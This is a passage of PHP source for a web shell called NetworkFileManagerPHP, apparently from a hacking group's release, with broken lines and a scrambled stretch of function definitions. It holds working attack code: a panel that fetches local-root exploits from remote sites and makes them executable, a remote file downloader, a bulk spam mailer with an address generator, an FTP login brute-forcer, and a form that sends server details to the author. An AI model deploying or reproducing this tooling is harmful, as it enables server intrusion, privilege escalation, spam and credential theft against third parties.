u>m</u>)</td></tr> <tr> <td class=pagetitle width=500>&nbsp;$title_ex[2]</td> <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'> <input type='hidden' name='file2' value='$public[2]'> <input type='submit' value='Get file' class=button1 $style_button></td></tr> </form></table>"; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok ' method=post> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (binary file to run - < u>p</u>)</td></tr> <tr> <td class=pagetitle width=500>&nbsp;$title_ex[3]</td> <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'> <input type='hidden' name='file2' value='$public[3]'> <input type='submit' value='Get file' class=button1 $style_button></td></tr> </form></table>"; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok ' method=post> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> &nbsp;&nbsp;<b>psyBNC version:2.3.2-4</b> - psyBNC (binary file to run - <u>./p sybnc</u>)</td></tr> <tr> <td class=pagetitle width=500>&nbsp;$title_ex[4]</td> <td width=100><input type='hidden' name='file3' value='$public_sites$public[4]' > <input type='hidden' name='file2' value='$public[4]'>

<input type='submit' value='Get file' class=button1 $style_button></td></tr> </form></table>";

echo "<br> <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok ' method=post> <tr $style_open><td align=left valign=top colspan=3 class=pagetitle> &nbsp;&nbsp;<b>Private exploits:</b></td></tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.* (binary file to run - <u>brk</u> )</td></tr> <tr> <td class=pagetitle width=500>&nbsp;$title_exp[1]</td> <td width=100><input type='hidden' name='file3' value='$private_site$private[1] '> <input type='hidden' name='file2' value='$private[1]'> <input type='submit' value='Get file' class=button1 $style_button></td></tr> </form></table>"; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok ' method=post> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 1</u></b> (binary file to run - <u>$private[2]</u> )</td></tr> <tr> <td class=pagetitle width=500>&nbsp;$title_exp[2]</td> <td width=100><input type='hidden' name='file3' value='$private_site$private[2] '> <input type='hidden' name='file2' value='$private[2]'> <input type='submit' value='Get file' class=button1 $style_button></td></tr>

</form></table>"; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok ' method=post> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 2</u></b> (binary file to run - <u>$private[3]</u> )</td></tr> <tr> <td class=pagetitle width=500>&nbsp;$title_exp[3]</td> <td width=100><input type='hidden' name='file3' value='$private_site$private[3] '> <input type='hidden' name='file2' value='$private[3]'> <input type='submit' value='Get file' class=button1 $style_button></td></tr> </form></table>"; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok ' method=post> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (binary file to run - <u> $private[4]</u> )</td></tr> <tr> <td class=pagetitle width=500>&nbsp;$title_exp[4]</td> <td width=100><input type='hidden' name='file3' value='$private_site$private[4] '> <input type='hidden' name='file2' value='$private[4]'> <input type='submit' value='Get file' class=button1 $style_button></td></tr> </form></table>"; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white>

<form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok ' method=post> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[5]</ u> )</td></tr> <tr> <td class=pagetitle width=500>&nbsp;$title_exp[5]</td> <td width=100><input type='hidden' name='file3' value='$private_site$private[5] '> <input type='hidden' name='file2' value='$private[5]'> <input type='submit' value='Get file' class=button1 $style_button></td></tr> </form></table>"; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok ' method=post> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (binary file to run - <u>$ private[6]</u> )</td></tr> <tr> <td class=pagetitle width=500>&nbsp;$title_exp[6]</td> <td width=100><input type='hidden' name='file3' value='$private_site$private[6] '> <input type='hidden' name='file2' value='$private[6]'> <input type='submit' value='Get file' class=button1 $style_button></td></tr> </form></table>"; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok ' method=post> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[7]</ u> )</td></tr>

<tr> <td class=pagetitle width=500>&nbsp;$title_exp[7]</td> <td width=100><input type='hidden' name='file3' value='$private_site$private[7] '> <input type='hidden' name='file2' value='$private[7]'> <input type='submit' value='Get file' class=button1 $style_button></td></tr> </form></table>"; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok ' method=post> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[8]</ u> )</td></tr> <tr> <td class=pagetitle width=500>&nbsp;$title_exp[8]</td> <td width=100><input type='hidden' name='file3' value='$private_site$private[8] '> <input type='hidden' name='file2' value='$private[8]'> <input type='submit' value='Get file' class=button1 $style_button></td></tr> </form></table>"; }

# new directory creation function newdir($dir) { global $tm,$nd; print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDE R=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=whit e><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td ali gn=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td va lign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=t op><input type=submit value='Create directory' class=button1 $style_button></td> </tr></form></table>"); }

function cdir($dir) { global $newd,$tm; $fullpath = $dir."/".$newd; if (file_exists($fullpath)) @rmdir($fullpath); if (@mkdir($fullpath,0777)) { echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=30 0 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was creat ed.</font></center></td></tr></table>"; } else { echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=30 0 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Error during direct ory creation.</font></center></td></tr></table>"; } chdir($tm); getdir(); readdirdata($tm); } // creation of directory where exploits will be situated function downfiles() { global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$ i,$j,$REMOTE_ADDR; $st = getcwd(); $st = str_replace("\\","/",$st); $j = 0; $gdir = array(); $gsub = array(); print("<br>"); for ($i=0;$i<=(strlen($st)-1);$i++) { if ($st[$i] != "/") { $gdir[$j] = $gdir[$j].$st[$i];

$gsub[$j] = $gsub[$j].$st[$i]; } else { $gdir[$j] = $gdir[$j]."/"; $gsub[$j] = $gsub[$j]."/"; $gdir[$j+1] = $gdir[$j]; $j++; } } print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% ali gn=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr>< td align=left><b>&nbsp;&nbsp;Path: </b>"); for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>" ); print("</TABLE> ");

echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 ali gn=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' me thod=post> <tr $style_open><td align=left valign=top colspan=3 class=pagetitle> &nbsp;&nbsp;<b>Upload files from remote computer:</b></td></tr> <tr> <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP link to filename:</td> <td width=200><input type='text' name='file3' value='http://' size=40></td> </tr> <tr> <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;filename (may also include full path to file)</td> <td width=200><input type='text' name='file2' value='' size=40></td> </tr> <tr>

<td width=600 colspan=2 align=center><input type='submit' value='Upload file' c lass=button1 $style_button></td></tr></td>


# directory delete function deldir() { global $dd,$tm; $fullpath = $tm."/".$dd; echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 ali gn=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr>< td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was deleted su ccessfully.</font></center></td></tr></table>"; rmdir($fullpath); chdir($tm); getdir(); readdirdata($tm); }

# directory compression function arhiv() { global $tar,$tm,$pass; $fullpath = $tm."/".$tar;

echo "<br> <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Directory <u><b>$fullpath </b></u> ".exec("tar -zc $fullpath -f $pass.tar.gz")."was compressed to file <u >$pass.tar.gz</u></font></center></td></tr></table>";

function down($dir) { global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2; ignore_user_abort(1); set_time_limit(0); echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle><b>File upload</b></font></b></td></tr> <tr><td bgcolor=#FFFFCC><br><blockquote>There are many cases, when host, where < b>NFM</b> is situated <b>WGET</b> is blocked. And you may need to upload files a nyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (see<b>Path</b>).(this works not everywhere)</blockquo te></td></tr> </table>";

if (!isset($status)) downfiles();

else {

$data = @implode("", file($file3)); $fp = @fopen($file2, "wb"); @fputs($fp, $data); $ok = @fclose($fp); if($ok) { $size = filesize($file2)/1024; $sizef = sprintf("%.2f", $size);

print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>< tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: < b>file <u>$file2</u> with size</b> (".$sizef."kb) </font></center></td></tr></ta ble>";

} else { print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>< tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Error during file upload</b></font></center></td></tr></table>"; } } }

# mail function function mailsystem() { global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOC UMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;

echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle><b>Questions and wishes for NetworkFileMana gerPHP</b></font></b></td></tr> <tr><td bgcolor=#FFFFCC><br> <blockquote>During your work with script <b>NetworkFileManagerPHP</b> you may wa nt to ask some quetions, or advice author to add some functions, which are not s upported yet. Write them here, and your request will be sattisfied. </blockquote></td></tr> </table>";

if (!isset($status)) echo "$form"; else { $email_to ="duyt@yandex.ru"; $subject = "NetworkFileManagerPHP ($name)"; $headers = "From: $email";

$info = "---==== Message from ($name)====---\n\n";

$info .= "Name:\t$name\n"; $info .= "Email:\t$email\n"; $info .= "What?:\n\t$pole\n\n"; $info .= "IP:\t$REMOTE_ADDR\n"; $info .= "HOST:\t$HTTP_HOST\n"; $info .= "URL:\t$HTTP_REFERER\n"; $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n"; $send_to = "$email_to";

$send = mail($send_to, $subject, $info, $headers); if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BO RDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black borderc olordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Than k you!!!Your e-mail was sent successfully.</font></center></td></tr></table><br> "; } } function spam() { global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_bo x, $domen; set_time_limit(0); ignore_user_abort(1); echo "<br> <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cent er bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle><b>Real uniq spamer</b></font></b></td></tr > <tr><td bgcolor=#FFFFCC><br><blockquote> Now, using this release of NFM you don' t need to by spambases, because it will generate spambases by itself, with 50-60 % valids. </blockquote></td></tr> </table>"; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form action='$PHP_SELF?action=spam' method=post> <tr><td align=left valign=top colspan=4 class=pagetitle> &nbsp;&nbsp;<b>email generator:</b></td></tr> <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500> &nbsp;&nbsp;This spammer is splited in two parts: <br> &nbsp;<b>1.</b> email generation with domains, included in script already, or e mail e-mail generation for domains was entered by you. Here choose how much acco unts do you wish to use ( the advice is to generate about &lt;u><i>10 000 , beca use may be server heavy overload</i></u> )<br> &nbsp;<b>2.</b> Type spam settings here</td></tr> <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' nam e='check_box[]'>&nbsp;&nbsp;if <b>checked</b> then you'll have default domains,

if not <b>checked</b> then domain will be taken from input.</td></tr> <tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;Generated email quant ity:</td> <td align=left colspan=2>&nbsp;&nbsp;&nbsp; <input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr> <tr><td align=center class=pagetitle width=200>&nbsp;Your domain:</td> <td align=left width=200>&nbsp;&nbsp;&nbsp; <input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td> </tr> <tr><td width=500 align=center colspan=2><input type='submit' value='Generate' c lass=button1 $style_button> </td></tr> </form></table>"; // letters function s() { $word="qwrtpsdfghklzxcvbnm"; return $word[mt_rand(0,strlen($word)-1)]; } // letters function g() { $word="eyuioa"; return $word[mt_rand(0,strlen($word)-2)]; } // digits function c() { $word="1234567890"; return $word[mt_rand(0,strlen($word)-3)]; } // common function a() { $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la', 'za','xa','ca','va','ba','na','ma'); $ab1=count($word); return $wq=$word[mt_rand(0,$ab1-1)]; } function o() { $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo', 'zo','xo','co','vo','bo','no','mo'); $ab2=count($word); return $wq2=$word[mt_rand(0,$ab2-1)]; } function e() { $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le', 'ze','xe','ce','ve','be','ne','me'); $ab3=count($word); return $wq3=$word[mt_rand(0,$ab3-1)]; } function i() { $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li', 'zi','xi','ci','vi','bi','ni','mi'); $ab4=count($word); return $wq4=$word[mt_rand(0,$ab4-1)]; } function u() { $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu', 'zu','xu','cu','vu','bu','nu','mu'); $ab5=count($word);

return $wq5=$word[mt_rand(0,$ab5-1)]; } function function function function function function function function function function function function function function function function name0() { name1() { name2() { name3() { name4() { name5() { name6() { name7() { name8() { name9() { name10() { name11() { name12() { name13() { name14() { name15() { return c().c().c().c(); return a().s(); } return o().s(); } return e().s(); } return i().s(); } return u().s(); } return a().s().g(); return o().s().g(); return e().s().g(); return i().s().g(); return u().s().g(); return a().s().g().s(); return o().s().g().s(); return e().s().g().s(); return i().s().g().s(); return u().s().g().s(); }

} } } } } } } } } }

$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,19 84,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,20 00,2001,2002,2003,2004,2005); $domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru ','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com'); $d1c=count($domain1); function randword() { global $cool,$cool2; $func="name".mt_rand(0,15); $func2="name".mt_rand(0,15); switch (mt_rand(0,2)) { case 0: return $func().$func2(); case 1: return $func().$cool[mt_rand(0,count($cool)-9)]; case 2: return $func(); default: return $func(); } } if (@unlink("email.txt") < 0){ echo ""; exit; } $file="email.txt"; if($chislo){ $cnt3=mt_rand($chislo,$chislo); for ($i=0; $i<$cnt3; $i++) { $u=randword(); if(!isset($check_box)){ if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 ) { $domen = $_POST["domen"]; foreach( $domen as $k=>$v ) {

$d=$domen[mt_rand(0,$v-1)]; } } $f=@fopen(email.".txt","a+"); fputs($f,"$u@$d\n"); }else{ $d=$domain1[mt_rand(0,$d1c-1)]; $f=@fopen(email.".txt","a+"); fputs($f,"$u@$d\n"); } } $address = $file; if (@file_exists($address)) { if($changefile = @fopen ($address, "r")) { $success = 1; } else { echo " File not found <b>\"".$address."\"</b> !<br>"; }

if ($success == 1) { echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 a lign=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>"; echo "<tr><td align=center class=pagetitle width=500> <b>$chislo</b> em echo "<tr><td align=center> "; echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>"; while($line = @fgets($changefile,1024)) { echo @trim(stripslashes($line))."\n"; } echo"</textarea></td></tr></table>"; } } if (!isset($action)){ echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/ form-data'> <tr><td align=center class=pagetitle colspan=2><b>Main spammer settings</b></fo nt></b></td></tr> <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;reply to:</td> <td align=left width=350>&nbsp;&nbsp;&nbsp; <input class='inputbox' type='text' name='from' size=50></td></tr> <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;send to:</td> <td align=left width=350>&nbsp;&nbsp;&nbsp; <input class='inputbox' type='text' name='otvet' size=50></td></tr> <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Delay (sec):</td> <td align=left width=350>&nbsp;&nbsp;&nbsp; <input class='inputbox' type='text' name='wait' size=50></td></tr> <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message topic:</td> <td align=left width=350>&nbsp;&nbsp;&nbsp; <input class='inputbox' type='text' name='subject' size=50></td></tr> <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message body:</td> <td align=left width=350>&nbsp;&nbsp;&nbsp; <textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr> <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;File:</td> <td align=left width=350>&nbsp;&nbsp;&nbsp;

<input class='inputbox' type='file' name='file' size=30></td></tr> <tr><td width=500 align=center colspan=2> <input type='submit' value='Generate' class=button1 $style_button > <INPUT TYPE='hidden' NAME='$chislo'> </td></tr> </form></table>"; } } } function spam1() { global $status, $from, $otvet, $wait, $subject, $body, $file, $chislo; set_time_limit(0); ignore_user_abort(1); echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle><b>Send spam with current settings</b></fon t></b></td></tr> </table>"; error_reporting(63); if($from=="") { print "<script>history.back(-1);alert('missing field : <send from>')</script>";exit;} error_reporting(63); if($otvet=="") { print "<script>history.back(-1);alert('missing field: <reply to>')</script>";exit;} error_reporting(63); if($wait=="") { print "<script>history.back(-1);alert('missing field: <send delay>')</script>";exit;} error_reporting(63); if($subject=="") { print "<script>history.back(-1);alert('missing field: <message topic>')</script>";exit ;} error_reporting(63); if($body=="") { print "<script>history.back(-1);alert('missing field: <message body>')</script>";exit; } $address = "email.txt"; $counter = 0; if (!isset($status)) echo "something goes wrong, check your settings"; else { echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center bgcolor=#FFFFCC>opening file <b>\"".$address."\"</b> ...<b r></td></tr> "; if (@file_exists($address)) { echo " <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was found... <br></td></tr> "; if($afile = @fopen ($address, "r")) { echo " <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was opened fo r read...<br></td></tr> "; } else { echo " <tr><td align=center class=pagetitle>Unable to open <b>\"".$address."\"</b> fo r read...<br></td></tr> ";

} } else { echo "There is no file <b>\"".$address."\"</b> !<br>"; $status = "unable to find file \"".$address."\" ..."; } echo " <tr><td align=center bgcolor=#FFFFCC>Begining read from file <b>\"".$address."\ "</b> ...<br></td></tr> </table>"; if (@file_exists($address)) { while (!feof($afile)) { $line = fgets($afile, 1024); $line = trim($line); $recipient = ""; $recipient = $line; #if # # # # # # ($file) { $content = fread(fopen($file,"r"),filesize($file)); $content = chunk_split(base64_encode($content)); $name = basename($file); } else { $content =''; } $boundary = uniqid("NextPart_");

$header = "From: ".$from."\r\n"; $header .= "Reply-To: ".$otvet."\r\n"; $header .= "Errors-To: ".$otvet."\r\n"; $header .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n"; $header .= "Content-Transfer-Encoding: 8bits\n"; $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n"; $header .= $body; # $header .="--$boundary\nContent-type: text/html; charset=iso-8859-1 \nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/ octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent -transfer-encoding: base64\n\n$content\n\n--$boundary--"; $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+"; $pattern.="@"; $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\."; $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#"; if($recipient != "") { if(preg_match($pattern,$recipient)) { echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 wi dth=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark= white> <tr><td align=center class=pagetitle>Sending mail to <b>\"".$recipient."\"</b>. ..sent "; if(@mail($recipient, stripslashes($subject), stripslashes($header))) { $counter = $counter + 1;

echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </tabl e>"; } else { echo "<tr><td align=center class=pagetitle>email is wrong, message was NOT sent !</td></tr> </table>"; } } else { $counter = $counter + 1; echo ""; } } else { echo "<br>"; } $sec = $wait * 1000000; usleep($sec); } if($otvet != "") { if(preg_match($pattern,$otvet)) { echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER =1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolor dark=white> <tr><td align=center class=pagetitle>Sending test message to < b>\"".$otvet."\"</b> to check out"; $subject = "".$subject; if(@mail($otvet, stripslashes($subject), stripslashes($message), stripsl ashes($header))) { $counter = $counter + 1; echo " message was sent... <b>[\"".$counter."\"]</b> ".date("H:i:s")." </td></tr> </table>"; } else { echo "<tr><td align=center class=pagetitle>message was not sent...</td ></tr> </table>"; } } else { echo "<tr><td align=center class=pagetitle>email is wrong.</td></tr> < /table>"; } } else { } if(@fclose ($afile)) { echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle>File <b>\"".$address."\"</b> was closed s uccessfully!<br></td></tr> </table>"; } else { echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle>Unable to close <b>\"".$address."\"</b> file!<br></td></tr> </table>"; } } else { echo "unable to read file <b>\"".$afile."\"</b> ...<br>";

} $status2 ="Status: ".$counter." messages were sent."; echo "<br>"; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle>$status2</td></tr> </table>"; } } # help function help() { global $action,$REMOTE_ADDR,$HTTP_REFERER; echo "<br> <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=cent er bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle><b>help for scriptNetworkFileManagerPHP</b> </font></b></td></tr> <tr><td bgcolor=#FFFFCC><br><b>NetworkFileManagerPHP</b> - script to access your host in a best way</font><br><br> There were added some commands to NFM, from scripts kind of itself. They are:<br > - Using aliases (<b>Rush</b>)<br> - FTP bruteforce (<b>TerraByte<b/>)<br> - Translated to english by (<b>revers<b/>)<br> - Added some sysinfo commands by (<b>revers<b/>)<br> - All the rest code belongs to me (<b>xoce<b/>)<br> - Thanks for testing goes to all #hack.ru channel<br><br> <b>Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... Pay mo re attention to configuration of your system.</b><br><br> <b>How can you find us:</b><br> Irc server: irc.megik.net:6667 /join #hack.ru<br> See you round at network!!!<br></td></tr></table><br>"; }

function exploits($dir) { global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $ public_site, $private_site, $private, $public, $title_ex, $title_exp; if (!isset($status)) upload_exploits();

else {

$data = implode("", file($file3)); $fp = @fopen($file2, "wb"); fputs($fp, $data); $ok = fclose($fp); if($ok) { $size = filesize($file2)/1024; $sizef = sprintf("%.2f", $size); print "".exec("chmod 777 $public[1]").""; print "".exec("chmod 777 $public[2]").""; print "".exec("chmod 777 $public[3]").""; print "".exec("chmod 777 $private[1]").""; print "".exec("chmod 777 $private[2]").""; print "".exec("chmod 777 $private[3]").""; print "".exec("chmod 777 $private[4]").""; print "".exec("chmod 777 $private[5]").""; print "".exec("chmod 777 $private[6]").""; print "".exec("chmod 777 $private[7]").""; print "".exec("chmod 777 $private[8]")."";

print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>< tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: < b>file with size</b> (".$sizef."kb) </font></center></td></tr></table>";

} else { print "Some errors occured."; } } }

# FTP-bruteforce function ftp() { global $action, $ftp_server, $filename, $HTTP_HOST; ignore_user_abort(1); echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>< tr><td align=center class=pagetitle>FTP server: <b>$ftp_server</b></td></tr>";

$fpip = @fopen ($filename, "r"); if ($fpip) { while (!feof ($fpip)) { $buf = fgets($fpip, 100); ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g); $conn_id=ftp_connect($ftp_server); if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {

$f=@fopen($HTTP_HOST,"a+"); fputs($f,"$g[1]:$g[1]\n"); echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>< tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1]." :".$g[1]."</b></td></tr></table>";

